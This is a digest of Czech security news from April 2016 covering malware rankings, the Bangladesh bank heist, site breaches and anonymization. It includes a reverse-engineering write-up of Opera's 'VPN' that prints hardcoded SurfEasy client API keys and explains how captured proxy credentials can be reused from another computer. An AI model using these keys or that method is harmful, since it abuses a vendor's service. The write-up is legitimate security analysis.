Její autoři Daniel Castro a Ann Cavoukian kritizují „zavádějící titulky a výroky v médiích“, které naznačují, že osoby s pouze průměrnými znalostmi a správnými technologickými nástroji dokážou odhalit totožnost osob, jejichž data se anonymizovala.
Chyba způsobující šíření tohoto mýtu je podle nich nikoli v samotných zjištěních prezentovaných výzkumníky v základní literatuře, ale „tendence komentátorů této literatury zveličovat publikovaná zjištění“.
Tvrdí, že správně udělaná anonymizace je prakticky neprůstřelná a snižuje riziko identifikace osob na méně než 1 %, což je méně než riziko narušení soukromí při dolování soukromých informací z vynášeného odpadu, který může obsahovat citlivé osobní informace.
Také argumentují, že neopodstatněný strach ze ztráty anonymity může podkopat „pokrok v oblasti analýz dat, které otevírají možnosti použití anonymizovaných datových souborů způsoby, jež nikdy dříve nebyly možné – třeba pro vytváření značných sociálních a ekonomických přínosů“.
Uznávají však, že aby byl proces anonymizace účinný, nesmí je uskutečňovat povrchním způsobem. A to je podle Pam Dixonové, výkonné ředitelky světového fóra pro soukromí (World Privacy Forum), skutečný problém. Ona a další tvrdí, že mimo kontrolované prostředí akademického výzkumu anonymita a soukromí v podstatě přestaly existovat.
Nedostatky soukromí
Dixonová neoponuje tvrzením o dosažitelné účinnosti ze zmíněného dokumentu, ale upozorňuje, že v reálném světě nedochází k důsledné anonymizaci všech množin dat.
„Ve skutečnosti to lidé nebudou dělat důsledně,“ tvrdí Dixonová a dodává. „Chcete-li získat skutečnou anonymitu při zpracování big dat, musíte použít mimořádně širokou úroveň agregace.“
Pokud se podle ní bavíme jen o údajích shromážděných pro celostátní či lokální trendy, potom lze anonymizace dosáhnout, protože nejde o samotné jednotlivce. Jestliže se však mluví o počtu osob s chřipkou v Praze a jsou k dispozici všechna poštovní směrovací čísla, je to už něco jiného.
Joseph Lorenzo Hall, hlavní technolog Centra pro demokracii a technologie (CDT, Center for Democracy & Technology), souhlasí, že ačkoli důsledná anonymizace je demonstrativně účinná, ve světě sběru dat tento ideální stav nevzniká. Jednou z příčin podle něj je, že skutečně neprůstřelná anonymizace snižuje užitečnost údajů.
„Podstatnou vlastností těchto souborů dat, které umožňují opětovnou identifikaci, je, že záznamy chování téhož jedince jsou vzájemně propojené. To je velká část přínosu uchovávání těchto záznamů,“ uvádí Hall.
Velkým problémem je podle něj zveřejňování souborů dat, které byly špatně anonymizované, a také sdílení údajů, u nichž se předpokládá nepřítomnost osobních informací, ale ve skutečnosti obsahují nějaký druh trvalého identifikátoru, který lze triviálně přiřadit k odpovídajícím osobám.
Zatímco některé shromažďování dat skutečně směřuje k ekonomickému prospěchu či zdraví obyvatelstva, Hall poznamenává, že v mnoha případech tomu tak není. „Některé maloobchody používají sledování Wi-Fi, v rámci něhož se využívá MAC adresa vašeho přístroje (trvalý síťový identifikátor), aby vás ve svém obchodě pečlivěji sledovali. To je důvod, proč Apple začal tyto adresy ‚randomizovat‘.“
Paul O‘Neil, konzultant pro zabezpečení informací ve společnosti IDT911 Consulting, má téměř totožný názor. „Pokud se anonymizace udělá dobře, potom to skutečně může fungovat. To slovo ‚pokud‘ je však mnohem významnější podmínka, než si většina lidí uvědomuje.“
Co má být anonymní?
Raul Ortega, manažer společnosti Protegrity, upozorňuje také na to, jak nevyrovnaná je ochrana soukromých dat. „Zatímco se zabezpečení kreditních karet zlepšuje, v oblasti anonymizace hromady citlivých osobních údajů, které existují v každé firmě, se toho dělá jen velmi málo.“
Částí tohoto problému může být podle právních expertů určitý aspekt sémantiky, který vede k obecnému zmatku. „Musíme mít jasno v tom, co máme na mysli, když prohlašujeme data za anonymní,“ upozorňuje Kelsey Finchová, poradkyně fóra pro budoucnost soukromí (FPF, Future of Privacy Forum)...
Úniky dat už dokáže zvládnout i běžný správce, tvrdí Safetica
29.4.2016 Ochrany
Novou – sedmou -- verzi svého řešení Safetica pro prevenci úniku dat představil stejnojmenný výrobce. Oproti předchůdci nabídne kromě zjednodušení použití i vylepšení v oblasti tzv. okamžité ochrany dat (zabezpečení citlivých firemních dokumentů bez omezení provozu) či lepší podporu více platforem.
Sedmá verze přináší usnadnění a zjednodušení procesu instalace a správy. Oproti šestce to prý v základní variantě zvládne i běžný IT administrátor. Instalace zároveň automaticky nakonfiguruje systém, správce hned získá přehled bezpečnostních rizik, která se navíc mohou zasílat jako automatické notifikace do e-mailu.
Safetica 7 zavádí i nový nástroj, webovou konzoli „WebSafetica“, která umožňuje přehledným způsobem zjistit co se děje v organizaci. Je dostupná z každého prohlížeče komukoliv uvnitř firmy, kdo disponuje přístupovými právy.
Oproti tomu desktopová konzole je vhodný nástroj pro administrátory pro konfiguraci firemních bezpečnostních politik. Řešení interní bezpečnosti je díky těmto nástrojům dosažitelné pro každou společnost.
Safetica 7 nově umožňuje správu i v operačním systému Windows 10. Je tak dostupná nejen pro systémy s Windows 7-10, ale také na terminálových serverech jako jsou Microsoft Terminal Server nebo Citrix XenApp, a na mobilních platformách Android a iOS.
Mezi další vylepšení patří i rozšíření šifrování disků pomocí BitLocker, takže pokud dojde například ke ztrátě notebooku nebo USB flash disku, nikdo nepovolaný se nedostane k citlivým firemním dokumentům. Produkt také automaticky zálohuje sbíraná data.
Škodlivý kód cílí na mobily, šíří se jako lavina
29.4.2016 Viry
Doslova jako lavina se v posledních týdnech začal šířit internetem nový škodlivý kód zvaný HummingBad, který se zaměřuje na chytré telefony s operačním systémem Android. Když se virus v mobilním přístroji zabydlí, převezme nad ním absolutní kontrolu. Před hrozbou varovali bezpečnostní analytici společnosti Check Point.
HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak může číhat na podvodných webech. „Tento malware se zaměřuje na zařízení se systémem Android. Vytváří trvalý rootkit na zařízení,“ upozornil David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Právě zmiňovaný rootkit, tedy schopnost viru se v zařízení maskovat, velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit. „Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.
Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android.
bezpečnostní odborník David Řeháček
Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.
Bezpečnostní experti bijí na poplach především proto, že nový mobilní virus se šíří neskutečně rychle. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval a HummingBad byl šestým nejčastějším malwarovým útokem na světě,“ podotkl Řeháček.
„Přestože byl HummingBad objeven výzkumníky společnosti Check Point až v únoru. Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android,“ uzavřel bezpečnostní odborník.
Android pod palbou kyberzločinců
Na zmiňovanou mobilní platformu od společnosti Google se skutečně počítačoví piráti zaměřují stále častěji. Zkraje dubna se například objevila podvodná aplikace vydávající se za aktualizaci klienta sociální sítě Facebook. Ta cílila opět na Android.
Před tímto nezvaným návštěvníkem v chytrých telefonech varovali zástupci Air Banky: „Pokusy útočníků nás nepřestávají překvapovat. Nově to zkouší tak, že vám s pomocí viru zablokují mobilní aplikaci pro přístup na Facebook a nabídnou vám instalaci nové.“
„Pokud se vám něco takového stane, rozhodně nic neinstalujte. Jinak by útočníci mohli získat přístup k vašim ověřovacím SMS, které vám chodí pro potvrzování plateb. Místo toho raději rovnou celý telefon resetujte do továrního nastavení,“ stojí v doporučení banky.
Nebezpečné viry napadly počítače německé jaderné elektrárny
29.4.2016 Viry
Kontrola v bavorské jaderné elektrárně Gundremmingen odhalila viry v několika počítačích a také v systému modelování pohybu palivových tyčí. Energetický koncern RWE, který je většinovým majitelem zařízení, tvrdí, že bezpečnost provozu ohrožena nebyla a že škodlivé programy nebyly v žádném systému obsluhujícím reaktory, napsal ve čtvrtek portál BBC.
Viry personál elektrárny odhalil během přípravy aktualizace kontrolních systémů bloku B, který je v současné době odpojen kvůli plánované údržbě. Škodlivý software byl nalezen i na 18 USB úložných zařízeních. Technici nyní z bezpečnostních důvodů provádějí inspekci více než tisícovky počítačů v komplexu.
Mezi zjištěnými viry byly například dobře známé programy W32.Ramnit a Conficker. Ramnit slouží ke vzdálenému přístupu do napadeného počítače a Conficker sbírá přihlašovací a bankovní údaje.
Pikantní na tom je, že Conficker není žádná nová hrozba. Na počítače s Windows útočí již od konce roku 2008 a drtivá většina antivirových programů si s tím dovede poradit. Vše tedy nasvědčuje tomu, že v bavorské jaderné elektrárně Gundremmingen zcela podcenili zabezpečení počítačových systémů.
RWE v reakci na to uvedla, že žádné vyzrazení citlivých údajů ani zneužití počítačů nehrozilo, neboť stroje nebyly připojené k internetu.
Jaký malware aktuálně útočí v Česku?
28.4.2016 Viry
Seznam nejčastěji použitého škodlivého kódu v Česku ke kyberútokům na podnikové sítě a mobilní zařízení, uveřejnil Check Point. Zároveň zveřejnil i žebříček zemí, které jsou nejčastěji terčem kyberútoků – ČR sice v současnosti figuruje až na 95. pozici, je to ale meziměsíčně posun o 14. míst nahoru.
V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval a HummingBad byl 6. nejčastějším malwarovým útokem na světě.
Poprvé byl mobilní škodlivý kód také v Top 10 za celé čtvrtletí, přestože byl HummingBad objeven výzkumníky společnosti Check Point až v únoru. Ukazuje to na velmi rychlý růst útoků na mobilní zařízení se systémem Android.
Check Point v průběhu března identifikoval více než 1 300 různých malwarových rodin, což je drobný pokles oproti předchozímu měsíci. To ovšem neznamená, že by byl březen bezpečnějším měsícem, jen to ukazuje na skutečnost, že kyberzločinci nemusí vyvíjet zcela nový malware pro útočné aktivity. Prostě jen udělají drobné změny v existujících malwarových rodinách, které umožní aktualizovanou variantou obejít tradiční bezpečnostní opatření.
Ukazuje se tak nutnost používat vyspělá preventivní opatření proti hrozbám a řešení pro prevenci mobilních hrozeb na úrovni sítí, koncových bodů a mobilních zařízení, aby došlo k zastavení škodlivého kódu už v předinfekční fázi.
Conficker byl v březnu nejrozšířenější malwarovou rodinou a byl zodpovědný za 20 % zaznamenaných útoků, vir Sality za 9,5 % útoků a Cutwail za 4 %. 10 nejčastějších mawlarových rodin bylo zodpovědných za více než polovinu zaznamenaných útoků.
↔ Conficker: Červ umožňuje vzdálené operace a stahování malwaru. Infikovaný počítač je pod kontrolou botnetu a je ve spojení s C&C serverem, aby mohl přijímat další pokyny.
↔Sality: Vir, který umožňuje útočníkům vzdálené ovládání a stahování a instalování dalších škodlivých kódů do infikovaných systémů. Sality se snaží maskovacími technikami vyhnout detekci a působit tak v systému co nejdéle.
↑ Cutwail: Botnet nejčastěji využívaný pro rozesílaní nevyžádaných e‑mailů a DDOS útoky. Jakmile je malware nainstalovaný, boty se připojí přímo k C&C serveru a přijímají pokyny o e‑mailech, které mají rozesílat. Jakmile je úkol hotov, bot hlásí spammerům přesné statistiky.
Check Point také identifikoval nejčastější mobilní malware v březnu 2016, tři nejrozšířenější malwarové rodiny cílily na zařízení se systémem Android:
↔ HummingBad - Malware zaměřený na zařízení se systémem Android. Vytváří trvalý rootkit na zařízení, instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggeru, krádež přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat.
↔ AndroRAT: Malware, který je schopen přibalit se k nějaké legitimní mobilní aplikaci a nainstalovat se bez vědomí uživatele, což hackerům umožňuje získat vzdáleně plnou kontrolu nad zařízením se systémem Android.
↑ Iop: Malware zaměřený na zařízení se systémem Android, který instaluje aplikace a zobrazuje nadměrné množství reklam pomocí root přístupu k mobilnímu zařízení. Množství reklamy a nainstalovaných aplikací neumožňuje uživateli používat přístroj jako obvykle.
„Po překvapivém únorovém umístění mobilního malwaru HummingBad v Top 10 všech malwarových rodin pokračuje růst těchto útoků i v březnu. Skutečnost, že tato dříve neznámá hrozba je již v první desítce světových malwarových rodin za celé první čtvrtletí roku 2016 ukazuje, jak reálné a rychlé nebezpečí je nárůst mobilního malwaru. Závislost organizací na mobilních zařízeních roste každým dnem, ale mobilní bezpečnost i nadále zaostává za zabezpečením sítí,“ říká Nathan Shuchami, ředitel prevence hrozeb ve společnosti Check Point.
Index hrozeb vychází z online mapy kybernetických hrozeb ThreatCloud World Cyber Threat Map, která v reálném čase sleduje, jak a kde po celém světě probíhají kybernetické útoky. Databáze ThreatCloud analyzuje více než 250 milionů adres a detekuje případné nakažení boty, obsahuje přes 11 milionů malwarových signatur a více než 5,5 milionu infikovaných webových stránek a identifikuje miliony malwarových typů každý den.
Top 10 malwarových rodin v České republice – březen 2016
Malwarová rodina
Popis
Conficker
Conficker je počítačový červ, který se zaměřuje na operační systém Windows. Využívá zranitelnosti v operačním systému a zkouší odhadnout administrátorské heslo pro další šíření a vytvoření botnetu. Infekce umožňuje útočníkovi získat přístup k osobním údajům uživatelů, jako jsou bankovní údaje, čísla kreditních karet nebo hesla. Červ původně cílil na uživatele komunikačních stránek, jako jsou Facebook, Skype a e-mailové stránky.
Graftor
Graftor je adware a zneužívá webový prohlížeč. Svými vlastnostmi se podobá trojskému koni. Může být použit jako nástroj pro stažení dalších škodlivých kódů. Je také znám pro skrývání spustitelných příkazů a DLL v PNG souborech, aby se vyhnul detekci. Některými dodavateli je vnímán jen jako nežádoucí program, ale Graftor má rootkitové schopnosti a C&C funkce, které z něj dělají mnohem nebezpečnější malware, než je jen obyčejný adware.
Cryptodef
Cryptodef je ransomware, která šifruje nebinární uživatelské soubory, jako jsou texty, dokumenty, obrázky, videa a další. Následně zobrazí textový soubor s pokyny k dešifrování souborů a pokyny pro platbu za použití dešifrovacích služeb. Obvykle je stažen jiným malwarem, které je již v počítači nainstalovaný, nebo je stažen přímo během procházení škodlivých nebo infikovaných webových stránek.
Angler ek
Angler byl poprvé detekován na konci roku 2013. Na začátku roku 2015 se jednalo o nejširší exploit kit a platí to i v roce 2016. Angler je známý pro rychlé využívání zranitelností nultého dne, někdy během pouhých několika dnů od prvního zveřejnění. Infekce začíná, když je prohlížeč přesměrován na vstupní infikovanou stránku, která obsahuje dobře maskovaný JavaScript. Úvodní stránka identifikuje verzi plug-inu v infikovaném počítači, takže lze využít dostupné zranitelnosti. Snaží se také zjistit, zda je zranitelný systém virtuální stroj. K útokům je nejčastěji využíván Flash, ale aktivní slabiny jsou také pro Javu, Silverlight, Acrobat nebo staré verze Internet Exploreru.
Nlbot
Nlbot je backdoor, který se zaměřuje na platformu Windows. Malware rozesílá systémové informace a přijímá různé příkazy z řídicího serveru, které mohou umožnit útočníkovi nahrávat/stahovat soubory, spouštět vzdáleně shell, získat protokoly, získat informace o peer botech, aktualizovat malware a řadu dalších věcí. Malware se dostane do Explorer.exe a dalších procesů pro skrývání své aktivity. Vytváří různé položky v registru, aby se aktivoval hned po restartování systému.
Ponmocup
Ponmocup je trojan, který se zaměřuje na platformu Windows. Malware modifikuje soubory v infikovaném systému, aby zabránil v přístupu k populárním torrentovým vyhledávačům. Do infikovaného systému také stahuje další škodlivé soubory.
Ctb-locker
CTB-Locker je ransomware, který se zaměřuje na platformu Windows. Zašifruje všechna uživatelská data a za dešifrování požaduje platbu. Malware se obvykle šíří jako spam s nebezpečnou přílohou ZIP nebo CAB. Malware je s největší pravděpodobností vyvíjen a distribuován ruskými kyberzločinci a je prodáván většinou také ruským subjektům. Jako označení se používají i další názvy, například Critroni nebo Onion. Písmena CTB ve jméně znamenají „Curve-Tor-Bitcoin“. Elliptic Curve pro šifrování a Tor a Bitcoin pro anonymitu výkupného.
Pbot
Pbot je škodlivý program typu „zadní vrátka“, který se zaměřuje na platformu Windows. Malware je navržen tak, aby útočníkům poskytl vzdálenou kontrolu nad infikovaným počítačem.
Cutwail
Cutwail je botnet využívaný pro rozesílání e-mailového spamu. Bot se připojí přímo k C&C serveru a přijímá pokyny o e-mailech, které má rozesílat. Po dokončení úkolu reportuje spammerům přesné statistiky, kolik e-mailů bylo doručeno a kolik hlásilo chybu. Cutwail je využíván také pro DDoS útoky.
Locky
Locky je ransomware, který se zaměřuje na platformu Windows. Malware posílá systémové informace na vzdálený server a přijímá šifrovací klíč pro zašifrování souborů v infikovaném systému. Malware požaduje jako výkupné za odemčení souborů platbu ve formě digitální měny bitcoin. Navíc přidává informaci i do registru, aby jej nebylo možné odstranit restartováním systému.
Další útok. Po webu ČSSD hlásí napadení i servery ČTK
27.4.2016 Zdroj: Lupa.cz Počítačový útok
Po webu sociálních demokratů se pod palbu internetových útoků dostaly i weby České tiskové kanceláře.
Klienti ČTK by se měli připravit na změnu hesel. Veřejnoprávní tisková agentura se totiž podle serveru HlídacíPes.org dostala v minulých dnech pod palbu internetového útoku. Dnes ráno to potvrdila i samotná agentura.
Poslední měl přijít během včerejší noci, který na čas vyřadil stránky z provozu. Zpravodajský servis ale podle všeho ohrožen nebyl. „Některé servery ČTK se v minulých dnech staly terčem útoku hackerů. Cílený útok v noci na dnešek chvílemi omezil dostupnost některých webových stránek a hackeři se také pravděpodobně dostali k některým údajům z databáze jednoho ze serverů. Může jít o hesla některých externích uživatelů. Hesla jsou uložena v šifrované podobě, nelze ale vyloučit, že stažená hesla se podaří prolomit,“ tvrdí oficiální prohlášení agentury.
Podle interního mailu, který má redakce HlídacíPes.org k dispozici, ale bylo útoků víc a odehrály se v několika posledních dnech. „Bohužel také zatím nemůžeme vyvrátit tvrzení hackerů, že stáhli z našich serverů data a hesla. Pokud k tomu došlo, jedná se pravděpodobně o hesla části registrovaných uživatelů Fotobanky,“ píše se v e-mailu, který rozesílal šéf IT oddělení.
Situaci agentura řeší ve spolupráci s externím partnerem. „Zablokovali jsme adresy, ze kterých byly útoky dosud vedeny, analyzujeme uložené záznamy a v nejbližší době zavedeme některá opatření, která by měla riziko dále snížit,“ uvádí interní materiál. Podle ČTK se na webových serverech neukládají žádné citlivé údaje zaměstnanců ani smluvních partnerů, taková data tedy zcizena být nemohla.
Jde už o třetí útok během tohoto týdne. Během noci na včerejšek byly DoS útokem sestřeleny stránky vládních sociálních demokratů a web byl nahozen až včera před obědem. Podle ČTK šlo o stejné útočníky, kteří se zaměřili na servery veřejnoprávní tiskové agentury.
Kromě toho včera ohlásil hack debatní server Lapiduch. „Domníváme se, že útočník získal databázi uživatelů, obsahující e-mailové adresy a přístupová hesla na Lapiduch,“ informuje dosud titulní stránka Lapiduch.cz.
Snažili se ušetřit. Miliardy korun naservírovali hackerům na zlatém podnosu
27.4.2016 Hacking
Hackerům se loni podařil opravdový majstrštyk. Z bangladéšské centrální banky odcizili 81 miliónů dolarů, tedy v přepočtu více než 1,9 miliardy korun. Po několikaměsíčním vyšetřování vyplouvají na povrch jen těžko pochopitelné závěry. Například to, že bankéři šetřili a nepoužívali firewall, napsala v minulých dnech agentura Reuters. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.
Firewall je síťové zařízení, které slouží k zabezpečení počítačových sítí. Jeho hlavním úkolem je tedy bránit počítače a servery v rámci dané sítě, aby se na ně nedostaly škodlivé viry a další nezvaní návštěvníci.
Podobná zařízení se běžně instalují i v malých firmách, protože i v nich administrátoři vědí, jak velké škody mohou počítačoví piráti na dálku napáchat. Bohužel počítačoví experti starající se o systém bangladéšské centrální banky, jejíž účet byl mimochodem veden u americké Federální rezervní banky (FED) v New Yorku, tolik obezřetní nebyli.
Podle vyšetřovatelů je to jeden z hlavních důvodů, proč se podařilo hackerům tolik peněz odcizit. „Bylo by tam daleko těžší proniknout, kdyby měli firewall,“ konstatoval podle agentury Reuters Mohammad Shah Alam, který měl v rámci bangladéšské policie případ na starosti.
Ušetřili pár stovek dolarů
Podle něj bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.
Není pochyb o tom, že hackeři si šli pro peníze najisto. Útočili totiž během víkendu, kdy přece jen komunikace mezi oběma institucemi – bangladéšskou centrální bankou a americkým FED – vázne. FED zaplavili množstvím žádostí o převod, přičemž se vydávali právě za bangladéšské bankéře.
FED jakékoli pochybení opakovaně odmítal. U všech požadovaných transakcí totiž byly použity tzv. SWIFT kódy, prostřednictvím kterých se jednotlivé banky identifikují. Všechny SWIFT kódy skutečně používali i bangladéšští bankéři, proto pracovníci FED neměli šanci poznat, že ve skutečnosti komunikují s hackery.
Kdyby banka měla firewall, patrně by se hackeři ke SWIFT kódům vůbec nemohli dostat.
Škoda mohla být ještě vyšší
Z účtů se původně snažili odčerpat 951 miliónů dolarů. I když se jim nakonec podařilo odčerpat pouze 81 miliónů, jde o jednu z největších bankovních loupeží v celé historii internetu.
Získané peníze hackeři převedli na různé účty na Filipínách. Vyšetřovatelé zjistili, že velká část z nich se protočila v rámci tamních kasin. Zda se ukradené milióny podařilo získat zpět, však není doposud jasné.
Guvernér bangladéšské centrální banky Atiur Rahmán rezignoval už loni, prakticky okamžitě po útoku hackerů.
Opera představila VPN, která vlastně není VPN. Takhle funguje
27.4.2016 Zdroj: Lupa.cz Zabezpečení
Opera Software ve své tiskové zprávě tvrdí, že jejich “VPN” je lepší, než tradiční VPN. No, jak se to vezme.
25.4. 16:15 – doplněn odkaz na The Oprah Proxy a informace o připojování přes HTTPS
Po několika dlouhých letech jsme se včera opět setkali a dnes jsme spolu strávili noc. Pamatuji si ji jako dívku, kterou bych ani za kus naleštěného chromu nevyměnil, ale dnes ráno jsem měl trochu hořko v ústech. Jmenuje se Opera a její rodiče se snaží dohnat vlak, který jim tak trochu ujel, když svého potomka v roce 2013 přestěhovali do čtvrti, kde vládne famílie Blink, aby s nimi Opera mohla začít nový život.
Opera se tento rok docela rozjela. V únoru Norská firma oznámila, že ji kupuje skupina čínských investorů, v březnu Opera přišla s blokováním reklam přímo zabudovaným do prohlížeče a minulý týden oznámila, že do svého prohlížeče přidala neomezenou „VPN“ zdarma. Ta je zatím jen ve vývojářské verzi Opery pro Windows, Mac a Linux a jedná se o produkt postavený na základech firmy SurfEasy, která nově patří do stále ještě norské rodiny. Uvidíme, s čím Opera přijde v květnu.
VPN (Virtual Private Network) je ta věc, kterou možná používáte v situaci, kdy chcete nebo musíte pracovat, ale máte tělo oslabené natolik, že si sotva dojdete pro nabíječku na laptop. Převážně velké nadnárodní firmy používají VPN, aby zpřístupnily své interní služby i lidem, kteří zrovna pracují z domova. VPN byste také měli používat vždy, když jste připojeni na nějakou veřejnou Wi-Fi, protože nikdy nevíte, komu ta síť patří a jaké má úmysly.
Jenže VPN v Opeře není tak docela VPN, i proto jsem tu zkratku výše dal do uvozovek. Klasická VPN totiž chrání všechna spojení, která jdou z vašeho počítače, včetně všech webových prohlížečů, outlooků a skajpů. VPN v Opeře zabezpečí jen Operu, respektive požadavky odcházející z a odpovědi vracející se do Opery. VPN v Opeře nezabezpečí jiné prohlížeče ani ty skajpy a outlooky. Potud asi v pořádku, ačkoliv to tisková zpráva Opery nezmiňuje. Jen na tohle musíte pamatovat, až si budete chtít ve vaší oblíbené kavárně stáhnout nově došlé e-maily do vašeho poštovního programu.
Sama Opera trochu tápe v tom, jak novou vlastnost nazývat, v nastavení sice najdete “povolení VPN”, ale hned pod tím je poznámka, že “zabezpečenou proxy poskytuje SurfEasy”. Zajímavé je i to, že když VPN zapnete, tak v prohlížeči nemůžete měnit nastavení proxy serverů. To trochu zavání, u klasických VPN takovéto omezení nenajdete.
Nastavení Opery s vyhledáním slova “proxy”
To zaujalo i Ondreje Galbavého a na Twitteru si lehce rýpnul do zástupce technického ředitele (Deputy Chief Technology Officer) Opery Bruce Lawsona, ale ten ho ujistil, že to opravdu je VPN.
A tady začíná moje část příběhu, to totiž zaujalo i mě a tak jsem si stáhnul vývojářskou Operu, spustil packetový sniffer a ponořil se do tajů prohlížečů postavených na Chromiu, abych zjistil, co to vlastně ta VPN od Opery je a…
Jak to funguje?
Jakmile v nastavení Opery zaškrtnete, že chcete VPN povolit, tak prohlížeč odešle několik požadavků metodou post na https://api.surfeasy.com, aby zjistil, kam a na jakou “VPN” se vlastně má připojit.
První požadavek jde na https://api.surfeasy.com/v2/register_subscriber a z odpovědi serveru browser získá několik cookie, které později posílá pro ověření zpět na SurfEasy API. Jsou to cookie subscriber_credentials, api_session (ta se v průběhu posílání požadavků mění) a _proxy_manager_session31. V požadavku jsou vidět hlavičky SE-Client-Type a SE-Client-API-Key, to jsou pravděpodobně hodnoty uvedené přímo v browseru, alespoň to tak vypadá po prozkoumání rozšíření SurfEasy VPN for Opera, ze kterého nejspíš “VPN” v Opeře vychází.
Api.CLIENT_TYPE_OPERA = 'se0204';
Api.CLIENT_TYPE_CHROME = 'se0205';
Api.CLIENT_API_KEY_OPERA = '184E166877D1AA1AB7BB702E31DE0EE650442D67529CFEE7DA12FE72455EF32D';
Api.CLIENT_API_KEY_CHROME = '37403FC0A1C5C5FCDAAF7A31253A855AC900BEE2CFF2AB3FFF5AEFD83ECB04F9';
api.js z surfeasy-proxy-an-opera-software-company-1.2.3–1.crx
Druhý požadavek browser posílá na https://api.surfeasy.com/v2/register_device, server nazpět pošle device_password a device_id, těmito údaji se poté browser autorizuje proxy serveru (kterému Opera říká VPN server)
"data" : {
"device_password" : "C74891C1220057FBC43B1C403D6D10916F609DFB678D04BAB39303646E14CA77",
"client_type" : "se0304",
"device_id" : "se0304-30e2096eed63607b34b36af"
},
Příchozí id a heslo
Požadavkem poslaným na https://api.surfeasy.com/v2/geo_list pak Opera zjišťuje, kde všude po světě jsou dostupné VPN proxy servery.
V odpovědi na poslední, čtvrtý požadavek se Opera konečně dozví, jaké IP adresy jednotlivé proxy servery mají a v jaké zemi se ten který server nachází. Nějakou vnitřní magií si vybere jednu IP adresu, v mém případě to byla adresa 185.108.219.42, ke které prohlížeč přiřadil jméno de0.opera-proxy.net a server s tímto jménem pak používal jako proxy server. Jméno de0.opera-proxy.net jde přeložit na IP pouze a jen v Opeře a jen když je zapnutá “VPN”, Opera pravděpodobně používá nějak upravený resolver.
Kompletní záznam všech požadavků a odpovědí najdete u mě na GitHubu. Vytvořil jsem také jednoduchý skript v Pythonu, který všechny ty požadavky pošle a zpracuje tak, jak to nejspíš dělá i samotná Opera. Nazval jsem ho The Oprah Proxy.
Proxy servery jako např. de0.opera-proxy.net vyžadují jméno a heslo, heslo prohlížeč zná z odpovědi na druhý API požadavek ( device_password), jméno je vypočítané jako sha1(device_id). Když toto jméno a heslo získáte, třeba tak, že si v browseru zachytíte požadavek na proxy server, který jméno a heslo obsahuje v hlavičce Proxy-Authorization, tak se pak na proxy servery Opery můžete připojit i z jiného počítače, na kterém Opera vůbec není nainstalována. Jsou to klasické HTTP(S) proxy servery, které vyžadují ověření, ne VPN servery.
Od těch klasických běžných HTTP proxy serverů se přece jen ve dvou věcech odlišují: za prvé, browser se na ně připojuje vždy pomocí šifrovaného HTTPS, a to i přesto, že se zrovna snaží načíst stránku pomocí nešifrovaného HTTP a za druhé, překlad domény na IP adresu se provádí až na tom proxy serveru, nedělá ho samotný prohlížeč, takže z browseru bokem neutíkají nešifrované dotazy do DNS. Díky tomu si celkem oprávněně zaslouží název “secure proxy”.
Proxy vyžaduje ověření
Je tu ještě několik důležitých drobností. Nastavení “VPN” přežije restart browseru, což znamená, že device_id (a tedy uživatelské jméno pro přihlášení na proxy) zůstává stejné, i když browser vypnete a zase zapnete. Toho by se dalo využít pro sledování chování uživatelů, a reklamní průmysl by jistě věděl, co s takovými daty dělat. Parametr device_id přežije dokonce i reinstalaci browseru, pokud při odinstalaci nevyberete, že chcete smazat i uživatelská data.
“VPN” v Opeře má ještě jeden problém. Může prozradit vaši IP adresu, i když jste připojeni přes tuto “VPN”. K vyzrazení se dá zneužít WebRTC, které adresu leakne. Vyzkoušet si to můžete na https://ipleak.net/. Pokud jste připojení přes opravdovou VPN, tak by k vyzrazení vaší IP adresy docházet nemělo.
Opera Software ve své zprávě tvrdí, že jejich “VPN” je lepší, než tradiční VPN. No, jak se to vezme. Není to VPN, nezabezpečí to všechna spojení tak jako VPN, ale umí to vyzradit vaši IP adresu a má to potenciální sledovací možnosti a je to zdarma a neomezené. Odpovězte si raději sami.
Podobných “VPN” bude jistě víc, ale pokud si chcete vybrat nějakou opravdovou VPN, může vám pomoci třeba tento rozsáhlý přehled porovnávající VPN služby. SurfEasy, tedy služba, kterou Opera používá, tam nemá zrovna nejlepší hodnocení, údajně má zaznamenávat IP adresy klientů používajících službu, ačkoliv v Privacy Policy aktualizované 18. dubna už tvrdí, že to nedělá.
Další únik údajů ze seznamky: data milionu uživatelů BeautifulPeople.com
27.4.2016 Zdroj: Lupa.cz Incidenty
Pokud jste stále nepochopili: kamkoliv na internetu vložíte jakákoliv osobní data, musíte počítat s tím, že se dříve nebo později mohou stát věcí veřejnou.
Reálné údaje o více než milionu uživatelů seznamky BeautifulPeople.com jsou dostupné na internetu. Jde přitom o následek hacku z konce minulého roku, o kterém se ví už někdy od listopadu 2015. Co je na celé kauze podstatného a nového je to, že jde o reálná data. Provozovatel celou dobu tvrdil, že se útočníkům podařilo dostat pouze na testovací server, na kterém neměla být ostrá databáze.
Plyne z toho jedno poučení uvedené v perexu, tedy to, že pokud komukoliv svěříte nějaké informace (osobní zejména), tak musíte počítat s tím, že dříve či později dojde k nějakému jejich úniku. A zadruhé, že pokud k něčemu takovému dojde, tak jde obvykle pravdomluvnost stranou a provozovatelé se snaží lhát a lhát.
